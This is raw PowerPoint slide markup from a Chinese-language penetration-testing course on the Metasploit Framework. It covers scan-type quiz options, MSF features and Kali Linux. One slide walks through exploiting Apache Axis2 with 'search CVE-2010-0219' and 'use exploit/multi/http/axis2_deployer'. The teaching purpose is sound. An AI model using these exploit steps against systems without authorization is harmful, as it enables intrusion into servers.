                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t> scan</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>    </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>D. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>ACK flag probe </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>scan</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="342900" indent="-342900">
                        <a:buAutoNum type="alphaUcPeriod"/>
                      </a:pPr>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1400" b="1" dirty="0">
                        <a:effectLst>
                          <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                            <a:srgbClr val="000000">
                              <a:alpha val="43137"/>
                            </a:srgbClr>
                          </a:outerShdw>
                        </a:effectLs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83149601"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14319823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a:t>滲透測試</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="6000" dirty="0" smtClean="0"/>
              <a:t>主題</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="6000" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="6000" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0"/>
              <a:t> Framework</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1782247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5349" y="301752"/>
            <a:ext cx="7772400" cy="828779"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Framework</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="438150" y="1378457"/>
            <a:ext cx="8039100" cy="4288917"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> Framework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>MSF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>）是一個廣泛使用的開源安全漏洞評估工具，主要用於開發和執行各種安全測試、滲透測試和漏洞利用。它提供了一個模組化、可擴展的平台，使安全專業人員能夠有效地進行測試和漏洞利用，以確保系統的安全性。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> Framework </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的主要特點包括：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
              <a:t>模組化架構：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>使用模組化的架構，允許用戶根據需要自由添加、刪除或修改不同的模組。這包括各種攻擊模組、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>模組、漏洞利用模組等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
              <a:t>多平台支持：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>可以在多種操作系統上運行，包括 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>macOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>等。這使得用戶能夠在不同環境中進行安全測試。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
              <a:t>漏洞利用：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> Framework </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>內置了大量的漏洞利用代碼，使用戶能夠利用特定漏洞進行安全測試，以確保系統的強健性。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>Payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
              <a:t>支持：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>提供了多種 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，用於在成功入侵目標後執行特定的操作，例如遠程命令執行、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>提取、檔案上傳等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
              <a:t>全面的測試工具：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> 除了漏洞利用外，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>還提供了許多用於信息收集、探測、社交工程等測試的工具。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20033704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9011" y="484632"/>
            <a:ext cx="8420793" cy="1327543"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>The architecture of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t> framework</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="內容版面配置區 3"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914505" y="1711591"/>
            <a:ext cx="6890108" cy="4797274"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="圓角矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6610350" y="5638800"/>
            <a:ext cx="1171575" cy="8477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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7804613" y="5877996"/>
            <a:ext cx="657744" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>New</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40566104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400" dirty="0"/>
              <a:t>Google </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0"/>
              <a:t>搜尋 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Apache Axis2 CVE</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0"/>
              <a:t>找到一個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0"/>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0"/>
              <a:t>分的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>漏洞</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685800" y="2259528"/>
            <a:ext cx="7772400" cy="3774044"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2017414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685800" y="2579223"/>
            <a:ext cx="7772400" cy="3134653"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文字方塊 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1257300" y="1038225"/>
            <a:ext cx="4990469" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>模組，因為暴力破解通常需要字典</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>檔</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1818085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8724" y="102247"/>
            <a:ext cx="7772400" cy="812153"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0"/>
              <a:t>Kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="內容版面配置區 6"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="827543" y="1557228"/>
            <a:ext cx="6915244" cy="4993883"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="圖片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="532315" y="819150"/>
            <a:ext cx="7505700" cy="6038850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13529869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a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639388" y="299828"/>
            <a:ext cx="7772400" cy="813816"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>啟動</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="內容版面配置區 3"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1662545" y="1115467"/>
            <a:ext cx="5345084" cy="5568532"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3931840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389382"/>
            <a:ext cx="7772400" cy="648843"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0" smtClean="0">
                <a:latin typeface="標楷體" panose="03000509000000000000" pitchFamily="65" charset="-120"/>
                <a:ea typeface="標楷體" panose="03000509000000000000" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>滲透測試</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0">
                <a:latin typeface="標楷體" panose="03000509000000000000" pitchFamily="65" charset="-120"/>
                <a:ea typeface="標楷體" panose="03000509000000000000" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>–Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0">
                <a:latin typeface="標楷體" panose="03000509000000000000" pitchFamily="65" charset="-120"/>
                <a:ea typeface="標楷體" panose="03000509000000000000" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>Axis2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685799" y="1505635"/>
            <a:ext cx="5305425" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>搜尋漏洞可用模組</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>search CVE-2010-0219</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>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stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="345322" y="3358343"/>
            <a:ext cx="8686456" cy="1426326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2959921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04925" y="2267635"/>
            <a:ext cx="6896100" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>使用該模組</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>use exploit/multi/http/axis2_deployer</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2609850" y="3584575"/>
            <a:ext cx="3924300" cy="1123950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1602991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17104" y="272534"/>
            <a:ext cx="2509790" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>查看模組設定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>options</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
